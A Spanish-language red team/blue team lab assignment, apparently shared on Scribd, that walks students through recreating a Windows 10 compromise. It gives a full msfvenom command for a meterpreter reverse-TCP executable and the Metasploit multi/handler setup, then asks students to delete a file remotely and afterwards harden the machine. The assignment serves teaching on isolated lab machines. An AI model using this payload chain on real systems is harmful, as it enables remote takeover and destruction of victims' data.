Scribd
Cargar
19 vistas3 páginas

Taller RedTeam BlueTeam

Un equipo de seguridad informática analizó un ataque a una computadora con Windows 10 que carecía de protecciones de seguridad. El ataque involucró la ejecución de un archivo .exe descargado de WhatsApp que eliminó un archivo de texto del escritorio. El equipo procedió a recrear el ataque usando msfvenom para crear un payload que abrió una sesión meterpreter remota y eliminó el archivo de texto.

Cargado por

sergio arcila
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
19 vistas3 páginas

Taller RedTeam BlueTeam

Un equipo de seguridad informática analizó un ataque a una computadora con Windows 10 que carecía de protecciones de seguridad. El ataque involucró la ejecución de un archivo .exe descargado de WhatsApp que eliminó un archivo de texto del escritorio. El equipo procedió a recrear el ataque usando msfvenom para crear un payload que abrió una sesión meterpreter remota y eliminó el archivo de texto.

Cargado por

sergio arcila
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Situación problema: Análisis Red team

Una organización encontró que uno de sus equipos de cómputo que contenía
un Windows 10 X64 fue vulnerado de algún modo. El administrador de dicho
equipo se percató que había creado un archivo con extensión .txt ubicado en el
escritorio y el cual contenía los campos: Nombre_estudiante, este archivo en
mención ya no se encontraba en la ubicación descrita anteriormente.

El administrador de la computadora afectada menciona un dato bastante


valioso para el equipo Red Team de la organización y es que mediante un
whatsapp web un compañero de trabajo le envió un archivo con el nombre
PoCseminario.exe el cual procedió a descargar y a ejecutar en la computadora
afectada.

El administrador de la computadora afectada menciona las siguientes


características de la computadora en general:

Tenía un S.O Windows 10 a 64 bits


Los sistemas de seguridad tanto del S.O como externos se encontraban
desactivados totalmente (Firewall, Windows Defender, Antivirus entre otros)
Contaba con un archivo de texto ubicado en el escritorio
Recuerda haber ejecutado un archivo .exe con el nombre
PoC_nombre_estudiante.

Con la información obtenida el equipo Red Team proceden a analizar el


escenario el cual debe ser recreado por los estudiantes para documentar qué
fue lo que pasó en la computadora afectada y cómo lograron eliminar el archivo
de texto que se encontraba en el escritorio. Uno de los expertos en
ciberseguridad de la organización menciona que podría tratarse de un Payload
el cual se creó con MSFVNOM y se ejecutó con METASPLOIT. El experto
menciona el posible paso a paso para crear un PAYLOAD con extensión .exe
para ser ejecutado por la víctima, y posterior a ello como abrir una sesión por
medio de METASPLOIT para controlar de manera remota la computadora
afectada.

POC ATAQUE

Msfvenom es una herramienta por excelencia para la creación de carga útil por
medio de ejecutables los cuales pueden irrumpir en un sistema operativo
deseado o dispositivo móvil. Para iniciar este taller se debe tener en cuenta los
siguientes pasos:

Paso 1: La estructura básica en cuanto a sintaxis se va a explicar en este paso,


pero hay algo muy importante a tener en cuenta y es todo el tema relacionado
con la arquitectura de la máquina que se va a comprometer. La máquina
víctima debe estar en la misma red que la máquina atacante y estar en un
mismo fragmento de red, pueden crear las máquinas virtuales en modo bridge.

Paso 2: El siguiente paso es identificar el sistema operativo de la máquina


víctima, para este taller se menciona una máquina Windows 10 con una
arquitectura x64, pero dicha máquina debe tener todos los sistemas de
seguridad deshabilitados: Windows defender, firewall, antivirus y protección en
tiempo real, porque en el taller no se abarcará técnicas de evasión a los
antivirus.

Paso 3: Msfvenom contiene una singular estructura de sintaxis para la


selección y creación de ejecutables maliciosos, para el taller y teniendo en
cuenta el enunciado los principales comandos u opciones a utilizar son:

-p: Este comando indica la carga útil a usar en el ataque, o lo que se conoce
coloquialmente como payload, para el taller se debe hacer uso de un payload
que soporte arquitectura x64 de Windows y que por medio de una Shell reversa
genere un meterpreter.

--platform: Este parámetro indica la plataforma la cual se desea atacar dado


que msfvenom no solamente es funcional con Windows sino con otros sistemas
operativos, por ende, lo solicitado en el taller es un sistema operativo Windows.

-a: Este parámetro indica la arquitectura que se desea atacar, para el ejemplo
propuesto en el taller es una arquitectura x64, sino seleccionan esta opción por
defecto msfvenom manje una arquitectura x86.

LHOST: Este parámetro indica el LOCAL HOST, o ip de la máquina atacante,


esta debe ser introducida al momento de crear el ejecutable.

LPORT: Este parámetro indica el LOCAL PORT, o puerto de la máquina


víctima por la cual se dará la escucha de la víctima; para el ejemplo.

se hizo uso del puerto 443 el cual suele estar abierto en la mayoría de las
computadoras.

-f: Este parámetro indica el formato en el cual se generará el ejecutable, como


se utilizará para Windows el .exe es una opción adecuada y acorde al ejercicio.

>>: Indicador de ruta para almacenar el ejecutable creado por msfvenom.

Paso 2: Lo primero que se debe hacer es ejecutar la consola de Linux; para


activar la herramienta msfvenom simplemente se ejecuta el comando:
msfvenom, posterior a ello se inicia el ingreso del siguiente comando teniendo
en cuenta las instrucciones generadas con anterioridad en el paso 1:

msfvenom -p Windows/x64/meterpreter/reverse_tcp --platform windows -a x64


LHOST=IP_KALI LPORT=443 -f exe >>
/Directorio_guardar_ejecutable/Nombreejecutable.exe
nombre del Payload debe ser: PoC_nombreestudiante.exe

Paso 3: Una vez Windows tenga el archivo .exe creado por msfvenom es
procedente ejecutar msfconsole en una consola para hacer uso de un exploit
que contribuya a escuchar y ejecutar el meterpreter por medio de una Shell
reversa, para este ejemplo se utilizarán los siguientes parámetros:

Exploit: El exploit a utilizar es exploit/multi/handler

Payload: El payload a utilizar es el mismo que se utilizó en la construcción del


ejecutable windows/x64/meterpreter/reverse_tcp

LHOST: Se ingresa la ip del Kali Linux

LPORT: Se ingresa el puerto 443 el cual en la mayoría de las ocasiones se


encuentra en estado open.

Una vez mencionado los parámetros anteriores se hace uso de los comandos
use y set, dependiendo las acciones a ejecutar en msfconsole se utiliza cada
uno:

Para ingresar un exploit se utiliza el comando use, para ingresar payload, lhost,
y lport utilizan set, en la Fig. 2. Se observa todo el proceso de ejecución del
exploit, cuando se termine este proceso se tiene que ejecutar el .exe en la
máquina windows cuando esto suceda el ataque finalizará con la apertura de
un meterpreter para manipular la máquina windows.

Al completar estos pasos se evidencia el acceso remoto de una máquina Kali


Linux hacía la máquina Windows 10; usted debe consultar los comandos
meterpreter existentes para llegar hasta la ruta del archivo de texto y eliminarlo,
esto también debe ser documentado junto a todo el proceso anterior.

Contención de ataques informáticos

Además de lo anterior la organización les solicita a sus integrantes de


Blueteam tomar medidas al respecto del ataque expuesto en la parte anterior
donde se vio afectada una máquina con Window 10. Como experto en
Ciberseguridad usted deberá cumplir con las siguientes tareas las cuales
demanda la organización:

• Descargue una guía de hardenización para Windows 10


• Asegure la máquina que fue afectada con el Payload de la Etapa 4.
• Genere un documento donde mencione el paso a paso utilizado para
asegurar y erradicar el ataque ejecutado anteriormente.

También podría gustarte